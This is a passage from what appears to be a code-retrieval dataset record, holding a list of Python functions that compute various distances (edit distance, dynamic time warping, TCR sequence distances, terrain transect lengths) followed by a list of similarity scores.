results_dct[r\"$\\frac{{{}}}{{{}}}$\".format(cell_line, normalizer)] = cell_data / norm_data\n df = pandas.concat(results_dct)\n return df", "def levenshtein_distance(s, t, alphabet=string.printable, **weight_dict):\n if len(s) == 0 or len(t) == 0:\n return max([len(s), len(t)])\n\n rows = len(s) + 1\n cols = len(t) + 1\n\n w = dict((x, (1, 1, 1)) for x in alphabet + alphabet.upper())\n if weight_dict:\n w.update(weight_dict)\n\n dist = [[0 for _ in range(cols)] for _ in range(rows)]\n # source prefixes can be transformed into empty strings\n # by deletions:\n for row in range(1, rows):\n dist[row][0] = dist[row - 1][0] + w[s[row - 1]][0]\n # target prefixes can be created from an empty source string\n # by inserting the characters\n for col in range(1, cols):\n dist[0][col] = dist[0][col - 1] + w[t[col - 1]][1]\n\n for col in range(1, cols):\n for row in range(1, rows):\n deletes = w[s[row - 1]][0]\n inserts = w[t[col - 1]][1]\n subs = max((w[s[row - 1]][2], w[t[col - 1]][2]))\n if s[row - 1] == t[col - 1]:\n subs = 0\n else:\n subs = subs\n 
dist[row][col] = min(\n dist[row - 1][col] + deletes,\n dist[row][col - 1] + inserts,\n dist[row - 1][col - 1] + subs,\n ) # substitution\n\n return dist[row][col]", "def tsd_alpha(s_1, s_2, p_1, p_2, w_1, w_2, alpha_concurrency):\n\n def calculate_cost(s1_idx, s2_idx):\n t_1 = p_1[s1_idx] + w_1[s1_idx]\n if t_1 > 0:\n b_1 = (p_1[s1_idx]/t_1)\n cost = ((b_1*np.abs(p_2[s2_idx]-p_1[s1_idx])) +\n ((1 - b_1)*np.abs(w_2[s2_idx]-w_1[s1_idx])))\n else:\n cost = 0\n return cost\n\n dist = {}\n lenstr1 = len(s_1)\n lenstr2 = len(s_2)\n for i in range(-1, lenstr1+1):\n dist[(i, -1)] = i+1\n for j in range(-1, lenstr2+1):\n dist[(-1, j)] = j+1\n for i in range(0, lenstr1):\n for j in range(0, lenstr2):\n if s_1[i] == s_2[j]:\n cost = calculate_cost(i, j)\n else:\n cost = 1\n dist[(i, j)] = min(\n dist[(i-1, j)] + 1, # deletion\n dist[(i, j-1)] + 1, # insertion\n dist[(i-1, j-1)] + cost # substitution\n )\n if i and j and s_1[i] == s_2[j-1] and s_1[i-1] == s_2[j]:\n if alpha_concurrency[(s_1[i], s_2[j])] == Rel.PARALLEL:\n cost = calculate_cost(i, j-1)\n dist[(i, j)] = min(dist[(i, j)], dist[i-2, j-2] + cost) # transposition\n return dist[lenstr1-1, lenstr2-1]", "def DTWDistance(s1, s2):\n len_s1 = len(s1)\n len_s2 = len(s2)\n\n _dtw_mat = np.empty([len_s1, len_s2])\n _dtw_mat[0, 0] = abs(s1[0] - s2[0])\n\n # two special cases : filling first row and columns\n\n for j in range(1, len_s2):\n dist = abs(s1[0] - s2[j])\n _dtw_mat[0, j] = dist + _dtw_mat[0, j - 1]\n\n for i in range(1, len_s1):\n dist = abs(s1[i] - s2[0])\n _dtw_mat[i, 0] = dist + _dtw_mat[i - 1, 0]\n\n #  filling the matrix\n for i in range(1, len_s1):\n for j in range(1, len_s2):\n dist = abs(s1[i] - s2[j])\n _dtw_mat[(i, j)] = dist + min(\n _dtw_mat[i - 1, j], _dtw_mat[i, j - 1], _dtw_mat[i - 1, j - 1]\n )\n\n return _dtw_mat[len_s1 - 1, len_s2 - 1]", "def dist_optimizer(config, optimizer):\n build_strategy, exec_strategy = create_strategy(config)\n\n dist_strategy = DistributedStrategy()\n dist_strategy.execution_strategy = exec_strategy\n dist_strategy.build_strategy = build_strategy\n\n dist_strategy.nccl_comm_num = 1\n dist_strategy.fuse_all_reduce_ops = True\n dist_strategy.fuse_grad_size_in_MB = 16\n optimizer = fleet.distributed_optimizer(optimizer, strategy=dist_strategy)\n\n return optimizer", "def compute_pws_sparse(df, metrics, weights, kargs, radius=50, df2=None, cpu=1, chunk_size=500, store=False, pm_pbar=True):\n metric_keys = [k for k in metrics.keys() if not 'cdr3' in k]\n weight_keys = [k for k in weights.keys() if not 'cdr3' in k]\n assert metric_keys == weight_keys, \"metrics and weights keys must be identical\"\n \n if kargs is not None:\n kargs_keys = [k for k in kargs.keys() if not 'cdr3' in k]\n assert metric_keys == kargs_keys, \"metrics and kargs keys must be identical\"\n \n n1 = df.shape[0]\n \n \"\"\"Compute all but CDR3 as normal, but do not reexpand.\n Computing unique distances should not be memory or CPU intensive\"\"\"\n tcrdist = None\n components = dict()\n for k in metric_keys:\n if df2 is None:\n seqs2 = None\n else:\n seqs2 = df2[k].values\n\n \"\"\"With reexapnd = False, returns: pw_mat, uind_i1, uind_i2\"\"\"\n pwmat, ind1, ind2 = pw.apply_pairwise_rect(metric=metrics[k], \n seqs1=df[k].values, \n seqs2=seqs2, \n ncpus=min(cpu, 2),\n uniqify=True, \n reexpand=False,\n **kargs[k])\n\n components[k] = (pwmat * weights[k], ind1, ind2) \n\n \"\"\"Can't do this because it will be huge. 
Also can't compute list of\n potential D < radius because that also could be too large.\n But need to pre-compute these non-CDR3 because otherwise the CDR3\n matrix won't be sparse enough with the radius.\n\n Solution: chunk the computation here. Only compute subsets of potential\n seqs pairs sparsely and spread across processors.\"\"\"\n\n if cpu > 1 and n1 > chunk_size:\n \"\"\"Chunk along df (rows) only\"\"\"\n chunk_func = lambda l, n: [np.array(l[i:i + n], dtype=np.int64) for i in range(0, len(l), n)]\n # chunksz = max(len(pw_indices) // cpu, 1)\n \"\"\"Chunked indices is a list of arrays of indices\"\"\"\n \"\"\"List of the chunked [chunk_size,] arrays\"\"\"\n chunked_indices = chunk_func(np.arange(n1, dtype=np.int64), chunk_size)\n \n with multiprocessing.Pool(cpu) as pool:\n dists = parmap.map(memory._sparse_cdr3_tcrdist_shard,\n chunked_indices,\n components,\n df,\n metrics,\n weights,\n kargs,\n radius,\n df2,\n pm_parallel=True,\n pm_pool=pool,\n pm_pbar=pm_pbar)\n\n full_S = sparse.vstack(dists)\n else:\n full_S = memory._sparse_cdr3_tcrdist_shard(np.arange(n1, dtype=np.int64),\n components,\n df,\n metrics,\n weights,\n kargs,\n radius,\n df2) \n \n return {'tcrdist': full_S}", "def distance(transect, method, res, path):\n # record starting time\n start_time = time.time()\n\n headerfile= open(path + 'buffer/dem'+str(res)+'m_header.csv', 'rt')\n header = list(csv.reader(headerfile, delimiter=','))[0]\n\n cellsize=(float(header[2]),-float(header[2]))\n top_left_cor=(float(header[0]),float(header[1]))\n rows=int(header[3])\n cols=int(header[4])\n \n with open(path + 'buffer/'+str(res)+'m/tble_buff_'+str(transect)+'.csv', 'rt') as rasterfile:\n dem=list(csv.reader(rasterfile, delimiter=','))\n dem=np.array(dem[1:len(dem)]).astype(float)\n\n start_point, end_point = get_start_end_points(path, transect)\n \n if method == \"p2p\": # pixel to pixel distance\n pnts, elev = p2p_xyz(start_point, end_point, top_left_cor, cellsize, dem)\n else: # must be one of clos, wavg, bilin, biqua, biqub, tin, or nn\n pnts = make_pnts(start_point, end_point, path, cellsize)\n n_pts = pnts.shape[0]\n elev = np.zeros(n_pts)\n\n if method in [\"clos\", \"wavg\", 'biLin', 'biQua', 'biQub']:\n for i in range(n_pts):\n # compute elevation of each sample point\n (x, y) = pnts[i]\n nb_x, nb_y, nb_z = get_nb_vals(i, pnts, dem, top_left_cor, cellsize, rows, cols)\n if method == \"clos\":\n elev[i] = nb_z[2, 2]\n elif method == \"wavg\":\n elev[i] = neighborhood.WeightedAverage(x, y, nb_x, nb_y, nb_z)\n elif method == \"biLin\":\n elev[i] = neighborhood.BiLinear(x, y, nb_x, nb_y, nb_z)\n elif method == \"biQua\":\n elev[i] = neighborhood.BiQuadratic(x, y, nb_x, nb_y, nb_z) \n elif method == \"biQub\":\n elev[i] = neighborhood.BiQubic(x, y, nb_x, nb_y, nb_z)\n else:\n raise ValueError(\"Unknown method! 
Must be clos, wavg, biLin, biQua, or biQub\")\n else: # must be TIN OR NN\n tn_fname = 'vertices_tin' + str(int(cellsize[0])) + '.csv'\n tn_path=path + tn_fname\n tn_path=tn_path.replace('/simulation','')\n vertices = np.genfromtxt(tn_path, delimiter = ',')\n #Calculate distance between each pair of TIN points (memory consuming)\n #dists = cdist(pnts, vertices[:,0:2], 'euclidean')\n \n #Create a Delaunay triangulation using sample points and TIN vertices.\n tri = sp.Delaunay(vertices[:,0:2])\n #Create Delaunay Triangulation using the sample point and all vertices\n simplex_indices=tri.find_simplex(pnts)\n for i in range(n_pts):\n (x, y) = pnts[i]\n nbr_ver_indx = tri.simplices[simplex_indices[i]] \n nbr_ver = vertices[nbr_ver_indx]\n #con_ver = get_con_ver(vertices, dists[i], nbr_ver)\n #make an 2D array of the sample sample points because cdist only accepts two arrays\n pnts2=np.array([pnts[i], pnts[i]])\n #Get the distance between the sample point and all other points.\n dists = cdist(pnts2, vertices[:,0:2], 'euclidean')\n #Get nearest vertices around the sample points\n con_ver = get_con_ver(vertices, dists[0], nbr_ver) \n if method == \"TIN\":\n elev[i] = TIN_z(x, y, con_ver, nbr_ver)\n if method == \"NN\":\n elev[i] = NN_z(x, y, con_ver, nbr_ver, cellsize)\n\n dist = 0\n for i in range(len(pnts) - 1):\n d_incr = np.sqrt((pnts[i + 1][0] - pnts[i][0]) ** 2 + \n (pnts[i + 1][1] - pnts[i][1]) ** 2 + \n (elev[i + 1] - elev[i]) ** 2)\n dist = dist + d_incr\n \n # calculate time elapse\n elapsed_time = time.time() - start_time\n print('time elapsed: '+ str(elapsed_time))\n return dist, elapsed_time", "def c_align_small(self, tik_instance):\n n_d, d_d, h_d, w_d, c_d = self.dst_shape\n hw_d = h_d * w_d\n hwnoni = hw_d * self.n_o * self.n_i\n dhw_d = d_d * h_d * w_d\n\n ub_ori = tik_instance.Tensor(self.dtype,\n (self.ub_ele,),\n name=\"ub_ori\",\n scope=tik.scope_ubuf)\n ub_trans = tik_instance.Tensor(self.dtype,\n (self.ub_ele,),\n name=\"ub_trans\",\n scope=tik.scope_ubuf)\n\n burst_len = d_d * self.c_1 * hwnoni * self.c_0 // self.cp_align_len\n tik_instance.data_move(ub_ori,\n self.src_gm,\n 0, 1, burst_len, 0, 0)\n\n with tik_instance.for_range(0, d_d) as num_d:\n with tik_instance.for_range(0, self.c_1) as num_c1:\n ori_cur = num_d * self.c_1 * hwnoni * self.c_0\\\n + num_c1 * hwnoni * self.c_0\n trans_cur = num_d * self.c_1 * hwnoni * self.c_0\\\n + num_c1 * self.c_0\n nburst = hwnoni\n burst_len = self.c_0 // self.cp_align_len\n src_stride = 0\n dst_stride = (self.c_1 - 1) * self.c_0 // self.cp_align_len\n tik_instance.data_move(\n ub_trans[trans_cur],\n ub_ori[ori_cur],\n 0, nburst, burst_len, src_stride, dst_stride)\n\n with tik_instance.for_range(0, dhw_d) as num_dhw:\n src_cur = num_dhw * self.n_o * self.n_i * c_d\n dst_cur = num_dhw * c_d\n nburst = n_d\n burst_len = c_d // self.cp_align_len\n src_stride = 0\n dst_stride = (dhw_d - 1) * c_d // self.cp_align_len\n tik_instance.data_move(\n ub_ori[dst_cur],\n ub_trans[src_cur],\n 0, nburst, burst_len, src_stride, dst_stride)\n\n burst_len = n_d * dhw_d * c_d // self.cp_align_len\n tik_instance.data_move(self.dst_gm,\n ub_ori,\n 0, 1, burst_len, 0, 0)\n\n return tik_instance", "def string_edit_dist(str1, str2):\n sm = edit_distance.SequenceMatcher(a=str1, b=str2)\n return sm.distance()", "def test_CKA_distances(self):\n\t\tm1 = models.vgg11(weights='VGG11_Weights.IMAGENET1K_V1')\n\t\tm2 = models.vgg11(weights='VGG11_Weights.IMAGENET1K_V1')\n\t\tavg_dW, avg_db, distances = self.watcher.distances(m1, m2, method=CKA, 
pool=True)\n\t\t\n\t\tprint(\"====== pool=True ========\")\n\t\tprint(distances)\n\t\t\n\t\tactual_mean_distance = avg_dW\n\t\texpected_mean_distance = 1.0\n\t\tself.assertAlmostEqual(actual_mean_distance,expected_mean_distance, places=1)\n\t\t\n\t\tactual_mean_distance = avg_db\n\t\texpected_mean_distance = 0.0\n\t\tself.assertAlmostEqual(actual_mean_distance,expected_mean_distance, places=1)\n\n\n\t\tavg_dW, avg_db, distances = self.watcher.distances(m1, m2, method=CKA, pool=False)\n\t\t\t\t\n\t\tprint(\"====== pool=False ========\")\n\t\tprint(distances)\n\t\t\n\t\tactual_mean_distance = avg_dW\n\t\texpected_mean_distance = 1.0\n\t\tself.assertAlmostEqual(actual_mean_distance,expected_mean_distance, places=1)\n\t\t\n\t\tactual_mean_distance = avg_db\n\t\texpected_mean_distance = 0.0\n\t\tself.assertAlmostEqual(actual_mean_distance,expected_mean_distance, places=1)", "def _get_distance(reindeer, race_time):\n interval = reindeer.flight_time + reindeer.rest_time\n cycles = race_time // interval\n flight_time = min(reindeer.flight_time, race_time - interval * cycles)\n total_flying_time = reindeer.flight_time * cycles + flight_time\n return total_flying_time * reindeer.flight_speed", "def test_equals_distance_clusters_rust():\n rust_result = rust_force.calculate_distance_between_two_clusters(\n rust_buildings[:n_first_cluster], rust_buildings[n_first_cluster:], rust_first_cluster_position,\n rust_second_cluster_position)\n rust_result_parallel = rust_force.calculate_distance_between_two_clusters_parallel(\n rust_buildings[:n_first_cluster], rust_buildings[n_first_cluster:], rust_first_cluster_position,\n rust_second_cluster_position)\n assert rust_result == rust_result_parallel", "def test_distance_adc(self):\n railroad = trains.Railroad()\n self.assertEqual(railroad.distance('ADC'), '13')", "def mel_cep_dtw_dist(target, converted):\n total_cost = 0\n total_frames = 0\n\n for (tar, conv) in zip(target, converted):\n tar, conv = tar.astype('float64'), conv.astype('float64')\n cost, _ = dtw.dtw(tar, conv, mt.logSpecDbDist)\n frames = len(tar)\n total_cost += cost\n total_frames += frames\n\n return total_cost / total_frames", "def compute_static_td_broadening(self):\n self.check_temperatures()\n self.distribute_workload()\n self.temperature_dependent_broadening = (\n self.sum_qpt_function('get_tdb_static'))\n self.broadening_is_dynamical = False", "def dtwDistSymbolic(X, Y, m, n):\n dtw = np.zeros((m + 1, n + 1), dtype='int64')\n C = []\n for i in range(m + 1):\n for j in range(n + 1):\n dtw[i, j] = 99999\n dtw[0, 0] = 0\n\n for i in range(1, m+1):\n for j in range(1, n + 1):\n cost = 0 if X[i - 1] == Y[j - 1] else 1\n last_min = np.min([dtw[i, j-1], dtw[i - 1, j], dtw[i-1, j-1]])\n dtw[i, j] = cost + last_min\n # print(dtw)\n return dtw[m, n]", "def __compute_delay(\n arrival_time : Time, \n next_departure_time : Time, \n ttype : str, \n previous_route_id : str,\n next_route_id : str\n ) -> Time:\n # Allowed delay is simply the difference between next departure and current arrival time\n time_to_make_connection = next_departure_time - arrival_time\n if (previous_route_id != next_route_id): # if we are changing route add additional delay\n time_to_make_connection -= EXTRA_TRANSFER_TIME[ttype] # decrease of allowed connection time\n return time_to_make_connection", "def kc_distance(self, other, lambda_=0.0):\n return self._ll_tree.get_kc_distance(other._ll_tree, lambda_)" ]
[ "0.53767455", "0.4826406", "0.47805288", "0.4753317", "0.47484082", "0.46879807", "0.46756828", "0.46334925", "0.45374662", "0.4479596", "0.44660226", "0.44558287", "0.44372138", "0.44101122", "0.43605304", "0.4340066", "0.43351212", "0.4289836", "0.4284168", "0.42829153", "0.42755893", "0.42594606", "0.4254602", "0.42381892", "0.42364877", "0.42356375", "0.42312276", "0.42300743", "0.4198575", "0.4198551", "0.41874513", "0.41816157", "0.41596088", "0.41530952", "0.41521648", "0.41519806", "0.41444176", "0.41434577", "0.41415846", "0.41334322", "0.41262442", "0.41187", "0.4117028", "0.41165566", "0.41154718", "0.41141212", "0.4108284", "0.41047776", "0.41044515", "0.40983894", "0.4096646", "0.40961778", "0.40941164", "0.40869623", "0.40842724", "0.40764564", "0.40752554", "0.40685397", "0.40619808", "0.405885", "0.40544742", "0.40543956", "0.40502715", "0.4047791", "0.4035408", "0.40329498", "0.4029375", "0.40212402", "0.40207168", "0.40196228", "0.40192375", "0.40161568", "0.40153158", "0.39972672", "0.3997251", "0.39919418", "0.3990416", "0.39850807", "0.39802217", "0.3979795", "0.39796016", "0.39763844", "0.39695138", "0.3969389", "0.39654198", "0.39643586", "0.39563015", "0.39553842", "0.39547735", "0.3953716", "0.3952646", "0.39513072", "0.39449778", "0.3942024", "0.39407647", "0.39376652", "0.39355844", "0.39320576", "0.393177", "0.39312434" ]
0.6212199
0
Computes the tcrdist distance for sequences in seqs_mat indicated by pairs of indices.
def nb_vector_tcrdist(indices, seqs_mat, seqs_L, distance_matrix=tcr_nb_distance_matrix, dist_weight=3, gap_penalty=4, ntrim=3, ctrim=2, fixed_gappos=True):
    return _nb_vector_tcrdist(indices, seqs_mat, seqs_L, distance_matrix, dist_weight, gap_penalty, ntrim, ctrim, fixed_gappos)
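For context, a minimal usage sketch of the function above. It assumes `nb_vector_tcrdist` and its default `tcr_nb_distance_matrix` are importable from the module this document comes from; the `encode` helper, the alphabet ordering, and the example CDR3 strings are illustrative assumptions — in practice the integer encoding must match the alphabet ordering used to build `tcr_nb_distance_matrix`, which this sketch does not guarantee.

import numpy as np

# Hypothetical encoding helper: pack sequences into a zero-padded integer
# matrix (one row per sequence) plus a vector of true lengths.
ALPHABET = 'ARNDCQEGHILKMFPSTWYV'  # assumed ordering
CODE = {aa: i for i, aa in enumerate(ALPHABET)}

def encode(seqs):
    seqs_L = np.array([len(s) for s in seqs], dtype=np.int64)
    seqs_mat = np.zeros((len(seqs), seqs_L.max()), dtype=np.int64)
    for r, s in enumerate(seqs):
        seqs_mat[r, :len(s)] = [CODE[aa] for aa in s]
    return seqs_mat, seqs_L

seqs = ['CASSLAPGATNEKLFF', 'CASSLAPGTTNEKLFF', 'CASRRGQETQYF']
seqs_mat, seqs_L = encode(seqs)

# All unordered pairs (i, j), one row per comparison to compute.
indices = np.array([(i, j)
                    for i in range(len(seqs))
                    for j in range(i + 1, len(seqs))], dtype=np.int64)

dists = nb_vector_tcrdist(indices, seqs_mat, seqs_L)  # one int16 distance per pair

Each row of `indices` selects two rows of `seqs_mat`: equal-length pairs take the pure substitution path, while unequal-length pairs trigger the gap-position search and add `gap_penalty` per residue of length difference.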
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _nb_vector_tcrdist(indices, seqs_mat, seqs_L, distance_matrix=tcr_nb_distance_matrix, dist_weight=3, gap_penalty=4, ntrim=3, ctrim=2, fixed_gappos=True):\n assert seqs_mat.shape[0] == seqs_L.shape[0]\n\n dist = np.zeros(indices.shape[0], dtype=np.int16)\n for ind_i in nb.prange(indices.shape[0]):\n query_i = indices[ind_i, 0]\n seq_i = indices[ind_i, 1]\n q_L = seqs_L[query_i]\n s_L = seqs_L[seq_i]\n if q_L == s_L:\n \"\"\"No gaps: substitution distance\"\"\"\n for i in range(ntrim, q_L - ctrim):\n dist[ind_i] += distance_matrix[seqs_mat[query_i, i], seqs_mat[seq_i, i]] * dist_weight\n continue\n\n short_len = min(q_L, s_L)\n len_diff = abs(q_L - s_L)\n if fixed_gappos:\n min_gappos = min(6, 3 + (short_len - 5) // 2)\n max_gappos = min_gappos\n else:\n min_gappos = 5\n max_gappos = short_len - 1 - 4\n while min_gappos > max_gappos:\n min_gappos -= 1\n max_gappos += 1\n min_dist = -1\n # min_count = -1\n for gappos in range(min_gappos, max_gappos + 1):\n tmp_dist = 0\n # tmp_count = 0\n remainder = short_len - gappos\n for n_i in range(ntrim, gappos):\n \"\"\"n_i refers to position relative to N term\"\"\"\n # print (n_i, shortseq[i], longseq[i], distance_matrix[shortseq[i]+longseq[i]])\n tmp_dist += distance_matrix[seqs_mat[query_i, n_i], seqs_mat[seq_i, n_i]]\n # tmp_count += 1\n #print('sequence_distance_with_gappos1:', gappos, remainder, dist[seq_i])\n for c_i in range(ctrim, remainder):\n \"\"\"c_i refers to position relative to C term, counting upwards from C term\"\"\"\n tmp_dist += distance_matrix[seqs_mat[query_i, q_L - 1 - c_i], seqs_mat[seq_i, s_L - 1 - c_i]]\n # tmp_count += 1\n #print('sequence_distance_with_gappos2:', gappos, remainder, dist[seq_i])\n if tmp_dist < min_dist or min_dist == -1:\n min_dist = tmp_dist\n # min_count = tmp_count\n if min_dist == 0:\n break\n dist[ind_i] = min_dist * dist_weight + len_diff * gap_penalty\n return dist", "def _nb_vector_editdistance(indices, seqs_mat, seqs_L, distance_matrix=identity_nb_distance_matrix, gap_penalty=1):\n assert seqs_mat.shape[0] == seqs_L.shape[0]\n mx_L = nb.int_(np.max(seqs_L))\n\n dist = np.zeros(indices.shape[0], dtype=np.int16)\n \n \"\"\"As long as ldmat is big enough to accomodate the largest sequence\n its OK to only use part of it for the smaller sequences\n NOTE that to create a 2D array it must be created 1D and reshaped\"\"\"\n ldmat = np.zeros(mx_L * mx_L, dtype=np.int16).reshape((mx_L, mx_L))\n for ind_i in nb.prange(indices.shape[0]):\n query_i = indices[ind_i, 0]\n seq_i = indices[ind_i, 1]\n \n q_L = seqs_L[query_i]\n s_L = seqs_L[seq_i]\n if q_L == s_L:\n \"\"\"No gaps: substitution distance\n This will make it differ from a strict edit-distance since\n the optimal edit-distance may insert same number of gaps in both sequences\"\"\"\n #tmp_dist = 0\n for i in range(q_L):\n dist[ind_i] += distance_matrix[seqs_mat[query_i, i], seqs_mat[seq_i, i]]\n #dist[ind_i] = tmp_dist\n continue\n \n \"\"\"Do not need to re-zero each time\"\"\"\n # ldmat = np.zeros((q_L, s_L), dtype=np.int16)\n for row in range(1, q_L):\n ldmat[row, 0] = row * gap_penalty\n\n for col in range(1, s_L):\n ldmat[0, col] = col * gap_penalty\n \n for col in range(1, s_L):\n for row in range(1, q_L):\n ldmat[row, col] = min(ldmat[row-1, col] + gap_penalty,\n ldmat[row, col-1] + gap_penalty,\n ldmat[row-1, col-1] + distance_matrix[seqs_mat[query_i, row-1], seqs_mat[seq_i, col-1]]) # substitution\n dist[ind_i] = ldmat[row, col]\n return dist", "def get_all_distances(cls, indices, dist_mat):\n distances = []\n for i, j in 
combinations(indices, 2):\n distances.append(cls.get_dist(dist_mat, i, j))\n return distances", "def traj_loc_distance(trajs, locs):\n return distance_matrix(\n np.asarray([t.last_pos() for t in trajs]),\n locs[:,2:4]\n )", "def reduce_mtx(distmat, indices):\r\n return distmat.take(indices, 0).take(indices, 1)", "def nb_vector_editdistance(indices, seqs_mat, seqs_L, distance_matrix=identity_nb_distance_matrix, gap_penalty=1):\n #print(indices.shape)\n #print(seqs_mat.shape)\n #print(seqs_L.shape)\n return _nb_vector_editdistance(indices, seqs_mat, seqs_L, distance_matrix, gap_penalty)", "def simtraj(trans_mat, tsteps, stt=0):\n seq = zeros(tsteps)\n curr = stt\n \n nstates = trans_mat.shape[0]\n states = array([ii for ii in range(nstates)])\n \n for tt in range(tsteps):\n seq[tt] = curr\n weights = copy(trans_mat[curr, :])\n curr = discrete_dist(states, weights, nn=1)\n return seq", "def gen_dist(genes):\n\n # First generate an NxNxB matrix that has False where\n # i and j individuals have the same kth gene and True\n # otherwise (XOR operation). Then sum along\n # the genome axis to get distance\n return np.sum(genes[:,None,:] ^ genes, axis=-1)", "def compute_pairwise_distances(input_vecs: types.Tensor) -> types.Tensor:\n r = tf.reduce_sum(input_vecs * input_vecs, axis=1, keepdims=True)\n pdistance_matrix = (\n r\n - 2 * tf.matmul(input_vecs, input_vecs, transpose_b=True)\n + tf.transpose(r)\n )\n return tf.cast(pdistance_matrix, dtype=tf.float32)", "def _pairwise_dist(self,seq1,seq2):\n \n return jf.damerau_levenshtein_distance(str(seq1), str(seq2))", "def ComputeDistMatrix(dict_alignedSequences):\r\n \r\n # check if dictionary with keys as tuples containing integers and values as tuples containing strings\r\n check = True \r\n #1 Check Input is dict\r\n if isinstance(dict_alignedSequences, dict) == False:\r\n check = False\r\n \r\n #2 Check are the keys and values tuples. 
Do the keys only contain integers and the vlaues only strings\r\n i = 0\r\n while len(dict_alignedSequences) > i:\r\n #checking for keys and values as tuples\r\n if isinstance(list(dict_alignedSequences.keys())[i], tuple) == False or isinstance(list(dict_alignedSequences.values())[i], tuple) == False:\r\n check = False\r\n break\r\n #checking keys for integers\r\n if isinstance(list(dict_alignedSequences.keys())[i][0], int) == False or isinstance(list(dict_alignedSequences.keys())[i][1], int) == False:\r\n check = False\r\n break\r\n #checking values for strings\r\n if isinstance(list(dict_alignedSequences.values())[i][0], str) == False or isinstance(list(dict_alignedSequences.values())[i][1], str) == False:\r\n check = False\r\n break\r\n \r\n #increment the counter for while loop\r\n i += 1\r\n \r\n #3 Check sequences contain aligned DNA and are of equal length\r\n for key in dict_alignedSequences:\r\n if is_aligned_dna(dict_alignedSequences[key][0]) == False or is_aligned_dna(dict_alignedSequences[key][1]) == False:\r\n check = False\r\n break\r\n if len(dict_alignedSequences[key][0]) != len(dict_alignedSequences[key][1]):\r\n check = False\r\n break\r\n \r\n #final evalauation if data is usable\r\n if check == False:\r\n raise TypeError ('malformed input')\r\n \r\n #get number of sequences\r\n matrixdim = howmany_sequences(dict_alignedSequences)\r\n #initialize dist matrix\r\n distMatrix = init_Dist_Matrix(matrixdim)\r\n \r\n \r\n for i in dict_alignedSequences.keys():\r\n # useing the key i to get the corisponding aligned sequences \r\n seq = dict_alignedSequences[i]\r\n #calculate distances between the sequences\r\n distance = calculate_distance(seq[0],seq[1])\r\n #markdown result at the corrsiponding place in the distmatrix\r\n distMatrix[i[0]][i[1]] = distance\r\n distMatrix[i[1]][i[0]] = distance\r\n \r\n return(distMatrix)", "def cal_distances(embeddings):\n # calculate\n dist = np.zeros([len(embeddings), len(embeddings)], dtype=float)\n for ii in xrange(len(embeddings)):\n for jj in xrange(ii + 1, len(embeddings)):\n dist[ii, jj] = np.linalg.norm(embeddings[ii] - embeddings[jj])\n dist[jj, ii] = dist[ii, jj] \n \n # return\n return dist", "def distance_matrix(sequences, substitution_mat):\n distance_mat = numpy.empty((len(sequences), len(sequences)), dtype='float')\n\n print(\"Building distance matrix\")\n # Get similarity score\n for i, seqA in enumerate(sequences):\n sys.stdout.write(\"\\r%.f%%\" % (float(i+1)/len(sequences)*100))\n sys.stdout.flush()\n for j, seqB in enumerate(sequences[i:], start=i):\n score = substitution_score(substitution_mat, seqA, seqB)\n distance_mat[i, j] = score\n distance_mat[j, i] = score\n print(\"\")\n # Set equal the diagonal\n diag_mini = numpy.min(distance_mat.diagonal())\n for i in range(len(sequences)):\n distance_mat[i, i] = diag_mini\n # Convert similarity score into a distance\n mini = numpy.min(distance_mat)\n maxi = numpy.max(distance_mat)\n return 1 - (distance_mat + abs(mini))/(maxi - mini)", "def get_distances(self, crds):\n self.all_dist = np.zeros((self.natom, self.natom))\n # Loop over upper triangle of atom pairs\n for iat in range(self.natom-1):\n # Get the atom indices\n at_inds = np.arange(len(crds))\n\n # Calc distances between atoms (only upper triangle though)\n at_msk = at_inds > iat\n all_ut_dist = crds[at_msk] - crds[iat]\n all_ut_dist = np.linalg.norm(all_ut_dist, axis=1)\n\n self.all_dist[iat, iat+1:] = all_ut_dist\n\n # Get lower triangle indices\n self.all_dist = self.all_dist + self.all_dist.T", "def 
measure_distance(self, mat):\n if len(mat) == 1:\n print(\"chain has only one CAatom\")\n return\n self.dists = []\n for num in range(0, len(mat)):\n if num + 1 <= len(mat) - 1:\n c1 = mat[num]\n c2 = mat[num + 1]\n d = c2 - c1\n self.dists.append(math.sqrt(np.sum(d * d)))\n return self.dists", "def distance_dmc(distances, Ks, points):\n doors = []\n for d in distances:\n dmc = []\n for k in Ks:\n print \"==========================\", k, \"==========================\"\n clusters = create_clusters(25, k)\n\n kmeans(points, clusters)\n # print \"Finished creating kmeans algorithm\"\n\n create_backbone_network(GRAPH, clusters, d)\n # print \"Finished creating backbone network\"\n\n find_all_shortest_paths(clusters, SP_TABLE, GRAPH)\n # print \"Finished finding all shortest paths\"\n\n for clst in clusters:\n clst.inter_cost = inter_cost(clst)\n clst.intra_cost = intra_cost(points, clst)\n clst.dm_cost = door_matt_cost(clusters, clst, SP_TABLE)\n\n ret = total_cost(clusters)\n dmc.append(ret[2])\n doors.append(sum(dmc))\n draw_door_matts(map(lambda d: float(format(d, \".4g\")), distances), doors)", "def compute_distmat(data, distfn):\n out = np.zeros((data.shape[0], data.shape[0]))\n for i in xrange(data.shape[0]):\n for j in xrange(data.shape[0]):\n if i == j: continue\n out[i,j] = distfn(data[i,:,:], data[j,:,:])\n return out", "def calc_distances(self, templates_features=None, batch_size=50000, th=0.2, beta=1.1):\n if templates_features is None:\n templates_features = self.calc_templates()\n distances = np.empty((self.pairs.shape[0]), dtype=np.float32)\n start, end = 0, 0\n for batch in self.batches(self.pairs, batch_size):\n t1 = np.empty((len(batch), self.features_dim), dtype=np.float32)\n t2 = np.empty((len(batch), self.features_dim), dtype=np.float32)\n start = end\n end += len(batch)\n # attenuate = np.empty((len(batch)), dtype=np.bool)\n for i, pair in enumerate(batch):\n t1[i] = templates_features[pair[0]]\n t2[i] = templates_features[pair[1]]\n # lomax1 = np.max(self.quality_scores[pair[0]])\n # lomax2 = np.max(self.quality_scores[pair[1]])\n # attenuate[i] = lomax1 <= th or lomax2 <= th\n\n ## find cosine distance, assume template descriptors are normalized\n distances[start:end] = 1 - np.einsum(\"ij,ij->i\", t1, t2)\n # distances[start:end] = np.where(attenuate, distances[start:end], distances[start:end] / beta)\n return distances", "def calcDistance(self):\n # Initialize the distance matrix\n arr = np.repeat(0, self.num_col)\n result_mat = np.repeat(arr, self.num_col)\n result_mat = np.reshape(result_mat, (self.num_col, self.num_col))\n trinary_mat = self.df_trinary.values\n for left_val in TRINARY_VALUES:\n left_func = lambda v: 1 if v==left_val else 0\n left_mat = np.transpose(np.vectorize(left_func)(trinary_mat))\n for right_val in TRINARY_VALUES:\n if left_val == right_val:\n continue\n right_func = lambda v: 1 if v==right_val else 0\n right_mat = 